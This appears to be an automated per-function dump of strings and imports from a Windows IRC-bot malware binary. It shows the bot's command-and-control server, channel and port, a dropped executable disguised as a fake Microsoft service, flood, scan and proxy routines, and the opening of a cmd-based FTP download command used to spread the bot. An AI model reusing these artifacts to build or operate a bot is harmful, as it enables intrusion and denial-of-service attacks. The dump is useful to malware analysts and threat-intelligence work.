sub_outside():
MSVCRT.strtok
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
MSVCRT.strncmp
KERNEL32.Process32Next
MSVCRT.strstr
MSVCRT.strncpy
MSVCRT.wcscat
MSVCRT.ftell
MSVCRT.fseek
WS2_32.send
WS2_32.recv
WS2_32.ntohs
WS2_32.recvfrom
WS2_32.inet_ntoa
MSVCRT.atoi
MSVCRT.rand
MSVCRT.free
MSVCRT.sprintf
KERNEL32.InterlockedCompareExchange
MSVCRT._errno
MSVCRT._iob
|
sub_409610(0076):
"invalid vector subscript"
|
sub_41D8E0(0226):
":"
":"
":"
"ftp(badlogin)"
"ftp(getting)"
"ftp(baddl)"
"http(badconnect)"
"GET %s HTTP/1.0\r\nConnection: Keep-Alive"...
"http(getting)"
"wb"
"http(badopen)"
"\r\n\r\n"
"dl, done. %s ."
"open %s."
"dl'ed-update: %s"
"exec.error"
|
sub_40F010(0307):
"ServicesActive"
|
sub_41A780(031f):
WS2_32.select
|
sub_431080(03f4):
KERNEL32.InterlockedCompareExchange
|
sub_41BA00(0a58):
MSVCRT.rand
|
sub_40B790(0cb7):
"true"
|
sub_42E4A0(0e69):
MSVCRT.fread
MSVCRT.fwrite
"short write: passed %d, wrote %d\n"
"localfile write"
|
sub_40D610(10d9):
"kernel32.dll"
"RegisterServiceProcess"
"CreateToolhelp32Snapshot"
"Process32First"
|
sub_431600(1663):
MSVCRT.free
|
sub_413BF0(17e9):
":"
":"
":"
|
sub_419370(1923):
MSVCRT._stricmp
WS2_32.ntohs
" "
"established"
"listening"
"%s:%d"
"%s:%d"
"%s: %d"
"%s: %s"
|
sub_429E60(19d1):
WS2_32.recv
WS2_32.ioctlsocket
WS2_32.closesocket
|
sub_40ECB0(2046):
"-netsvcs"
|
sub_42AF60(2156):
WS2_32.accept
|
sub_426D80(22b4):
WS2_32.socket
|
sub_4282F0(28e3):
WS2_32.closesocket
|
sub_40FFE0(2956):
MSVCRT.strstr
"%d.%d.%d.%d"
"%s %s\r\n"
"%s %s\r\n%s %s 0 0 :%s\r\n"
" "
" "
" "
" "
"%s %s\r\n"
" "
" "
" "
"%s %s\r\n"
"%s %s %s\r\n"
" "
"%s %s %s\r\n"
"%s %s\r\n"
" "
" "
"@"
":"
"|"
"|"
" -s"
" -n"
" -o"
" "
" "
"|"
"|"
" "
" -o"
" -s"
" -n"
":"
" "
"!"
"!"
"@"
"@"
" "
" "
" :"
" "
" "
" "
" "
" "
":"
"!"
"%s %s %s\r\n"
" "
":"
"!"
" :"
" :"
" "
" "
":"
"!"
":"
"!"
":"
"!"
|
sub_42CBB0(2f99):
MSVCRT.fprintf
MSVCRT.strncmp
"Control socket read failed"
"%s"
"%s"
|
sub_407790(304f):
"irc.alfree5.info"
"3266"
"##for##"
"##for"
"f"
"Srb0ty.exe"
"Srb0ty"
"F-"
"set"
"admin.com"
"X"
"MicroSoft Legal Service"
|
sub_412060(3261):
" "
" "
"%s %s :%s\r\n"
"%s"
" "
"%s"
" "
" "
"%s %s %s\r\n"
" "
"%s %s\r\n"
"%s\r\n"
" "
" "
" "
" "
" "
"%s %s %s %s\r\n"
|
sub_42A690(3685):
WS2_32.socket
WS2_32.sendto
WS2_32.closesocket
|
sub_420890(36df):
"AudioSrv"
"Browser"
"CryptSvc"
"Dhcp"
"dmserver"
"Dnscache"
"ERSvc"
"Eventlog"
"EventSystem"
"FastUserSwitchingCompatibility"
"helpsvc"
"lanmanserver"
"lanmanworkstation"
"LmHosts"
"Netman"
"PlugPlay"
"PolicyAgent"
"ProtectedStorage"
"RasMan"
"RpcSs"
"SamSs"
"Schedule"
"seclogon"
"SENS"
"ShellHWDetection"
"Spooler"
"SSDPSRV"
"stisvc"
"TapiSrv"
"TermService"
"TrkWks"
"upnphost"
"W32Time"
"winmgmt"
"WZCSVC"
"wuauserv"
"Themes"
"SYSTEM\\CurrentControlSet\\Services\\%s"
"[%s] [????.exe] (Unknown key)"
"ImagePath"
"[%s] [????.exe]"
"[%s] [%s]"
|
sub_413860(387f):
"%2.2X"
|
sub_426B00(3ead):
"%s: %s:%u (%dseconds)"
"%s: error creating threads"
"%s: attack@%s:%d done."
"%s"
|
sub_40F0B0(3edb):
"ServicesActive"
|
sub_4268C0(4314):
IPHLPAPI.IcmpCreateFile
IPHLPAPI.IcmpSendEcho
IPHLPAPI.IcmpCloseHandle
"ICMP.DLL"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
|
sub_420040(4492):
"unknown"
|
sub_423810(4bd5):
MSVCRT.rand
"%d.%d.%d.%d"
|
sub_40DBD0(4e41):
"%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n"
"%%comspec%% /c %s %s"
|
sub_41EFE0(4ec9):
WS2_32.send
MSVCRT.atoi
"220 \r\n"
"220 \r\n"
"331 \r\n"
"331 \r\n"
"230 \r\n"
"230 \r\n"
"200 \r\n"
"200 \r\n"
" "
","
","
","
","
","
","
"%d.%d.%d.%d"
"200 \r\n"
"200 \r\n"
"150 \r\n"
"150 \r\n"
"rb"
"ftp: %d.%d.%d.%d -> (%d bytes) (total s"...
"226 \r\n"
"226 \r\n"
"221 \r\n"
"221 \r\n"
|
sub_414DC0(4f91):
" "
" "
|
sub_4203B0(5287):
"ServicesActive"
|
sub_42B920(52e0):
"[%s] Redirecting from Port %d to '%s:%d"...
"[%s] Finished redirecting from port %d "...
|
sub_431320(57b7):
"KERNEL32.DLL"
"InterlockedCompareExchange"
|
sub_42D620(6168):
"Invalid direction %d\n"
"Invalid mode %c\n"
"PASV"
"%u,%u,%u,%u,%u,%u"
|
sub_40F130(6753):
"ServicesActive"
|
sub_42B440(68e9):
WS2_32.recv
WS2_32.send
|
sub_426740(69b7):
"%s: %s (%utimes/%ubytes/%dms)"
"[%s] Finished flooding %s %d Times"
"[%s] Cannot send pings - Doesn't have D"...
|
sub_406890(6a4c):
"95"
"NT"
"98"
"ME"
"2000"
"XP"
"2003"
"???"
"%s [%s]"
"CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "...
|
sub_425750(7228):
WS2_32.closesocket
|
sub_429A60(75a9):
"HTTP"
|
sub_426F50(75a9):
"syn"
|
sub_42A130(75a9):
"Socks4"
|
sub_429DA0(75a9):
"Socks4"
|
sub_4264F0(75a9):
"ping"
|
sub_427630(75a9):
"udp"
|
sub_426A40(75a9):
"forsyn"
|
sub_4066E0(7a4c):
"up: %dd %dh %dm"
|
sub_40A210(7c6d):
MSVCRT.strstr
|
sub_42DEC0(7fe2):
"net_write(1) returned %d, errno = %d\n"
"net_write(2) returned %d, errno = %d\n"
|
sub_429CD0(80fe):
"[%s] Starting proxy on %d with SSL."
"[%s] Starting proxy on port %d."
"[%s] Unloaded proxy on port %d."
|
sub_427B70(877d):
WS2_32.recv
|
sub_40C490(88b1):
" "
"[DCC]: Failed to create socket."
"dcc: failed to bind socket"
"dcc: failed to open socket"
"dcc: file doesn't exist"
"[DCC]: File doesn't exist."
"dcc: timeout"
"dcc: unable to open socket"
"dcc: complete to %s, file: %s, (%d byte"...
"dcc: socket error"
|
sub_42EAE0(89f2):
MSVCRT.free
"QUIT"
|
sub_40B710(8dfb):
"true"
|
sub_4228A0(902a):
"asn"
|
sub_433AC0(9072):
""
|
sub_4034E0(917c):
"|"
"a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"...
|
sub_42CCF0(9311):
"\r\n"
"read"
|
sub_40EDF0(946c):
"ServicesActive"
"\"%s\" %s"
|
sub_41F910(95c9):
MSVCRT.rand
WS2_32.closesocket
|
sub_40CFF0(9810):
MSVCRT._snprintf
"%s\\*"
"Found: %s\\%s"
|
sub_42A1F0(9a00):
"[%s] Starting Socks4 Proxy on port %d."
"[%s] Unloaded proxy on %d."
|
sub_420EC0(9c2d):
":"
"http"
"ftp"
"/"
"/"
"@"
":"
"/"
"@"
":"
"http"
"ftp"
"/"
"@"
":"
"/"
"@"
":"
":"
"/"
":"
"http"
"ftp"
"/"
"/"
"/"
"/"
|
sub_40A150(9cfe):
MSVCRT.strchr
|
sub_40CC40(9e2c):
" "
" "
"\\"
"Files Found: %d"
|
sub_42E070(a081):
MSVCRT.free
|
sub_422AF0(a085):
MSVCRT.atoi
WS2_32.send
MSVCRT.strrchr
"scan: cip (%s)"
"scan: not started"
" "
"ftp: port: %d, total sends: %d"
"scan: stopped (%d threads)"
"scan: couldn't stop"
" "
"scan: too many threads (%s)"
" "
"scan: stats:"
" %s: %d,"
" total: %d"
" "
" "
" "
" "
" "
"scan: invalid port"
" "
" "
" "
"scan: no ip specified"
"random"
"sequential"
"Scan(%s): %s Port Scan %s:%d - Delay %d"...
|
sub_4280E0(b1b6):
"[%s] Started redirect from \"%s\" to \"%s\""...
"[%s] Finished redirect from \"%s\" to \"%s"...
|
sub_41E710(b206):
"%d. - Pid: %d - \"%s\""
" "
" "
" "
" "
" "
" "
" "
" "
|
sub_42B5E0(b2ae):
WS2_32.ioctlsocket
WS2_32.recv
WS2_32.send
WS2_32.closesocket
|
sub_41A000(ca0b):
MSVCRT.strstr
|
sub_42D360(cb20):
MSVCRT.sprintf
"Missing path argument for file transfer"...
"Invalid open type %d\n"
|
sub_42C8B0(cbaa):
"tcp"
"ftp"
"tcp"
|
sub_4201A0(cc5a):
"SYSTEM\\CurrentControlSet\\Services\\%s"
"ImagePath"
"\\"
|
sub_4248D0(cd36):
"BBBB"
"CCCC"
|
sub_42D240(cd7e):
"%s\n"
"%s\r\n"
|
sub_419B90(cee6):
MSVCRT.strncpy
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_42D170(cf06):
MSVCRT.sprintf
"USER %s"
"PASS %s"
|
sub_41C6C0(d173):
" "
":"
" "
" "
":"
" "
" "
":"
" "
" "
" "
" "
" "
" "
" "
" "
" "
|
sub_42F8E0(d209):
MSVCRT._errno
|
sub_4129F0(d41e):
"%s %s :%s\r\n"
|
sub_41BD40(d56c):
MSVCRT.strtok
|
sub_41A360(d618):
WS2_32.WSAGetLastError
WS2_32.select
|
sub_42A8B0(dbd2):
WS2_32.select
WS2_32.socket
WS2_32.send
|
sub_423710(e39b):
"%d.%d.%d.%d"
|
sub_435790(e465):
" "
" "
" "
" "
" "
" "
" "
" "
"HKCR: %s"
" "
" "
"HKU: %s"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"ProductId"
"Found Windows Product ID (%s)."
|
sub_427860(e875):
MSVCRT.rand
WS2_32.sendto
|
sub_424EB0(e942):
WS2_32.send
|
sub_4205E0(e9d5):
"PSAPI.DLL"
"PSAPI.DLL"
"EnumProcessModules"
"GetModuleFileNameExA"
"unknown"
|
sub_4276F0(e9eb):
"%s: %s:%u (%ut/%ub/%dms)"
"%s: %s:%d done"
|
sub_404640(eaf3):
" -o"
" "
" "
" "
" "
|
sub_427010(f15c):
"%s: %s:%u (%usec/%dms)"
|
sub_404C70(f67c):
" "
" "
"exec.error"
" "
" "
"open"
" "
" "
" "
"%s resolved %s"
" "
" "
"%s -> %s"
" "
"resolve.error %s."
"%s %s\r\n"
"%s"
" "
"Executed: %s."
"exec.error"
" "
"%s"
"%s %s\r\n"
" "
"N"
"Software\\Microsoft\\OLE"
|
sub_4319A0(f851):
MSVCRT.free
|
sub_412730(f93f):
"%d.%d.%d.%d"
"lan: "
". "
". "
"[PRIVATE]"
"[PUBLIC]"
|
sub_4250B0(fc48):
WS2_32.ntohs
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_428360(fe1d):
MSVCRT.strncat
MSVCRT.strstr
WS2_32.recv
WS2_32.closesocket
" "
" "
"http"
" "
"CONNECT"
"connect"
" "
":"
" "
":"
" "
":"
" "
" "
"HTTPROX"
"\r\n"
"\r\n"
"\r\n"
"Proxy-Connection:"
":"
"Keep-Alive"
"%s %s %s\r\nConnection: Keep-Alive\r\n%s"
"%s %s %s\r\nConnection: close\r\n%s"
"\r\n"
"\r\n"
" "
" "
" "
"Transfer-Encoding:"
" "
"chunked"
" "
"Connection:"
" "
"Keep-Alive"
"\r\n"
"\r\n"
"\r\n"
"Connection: Keep-Alive\r\n"
"Connection: Keep-Alive\r\n"
"Connection: Close\r\n"
"Connection: Close\r\n"
"\r\n"
"HTTP/1.0 200 Connection established\r\n\r\n"...
"HTTP/1.0 503 Service Unavailable\r\nServe"...
"HTTP/1.0 503 Service Unavailable\r\nServe"...
|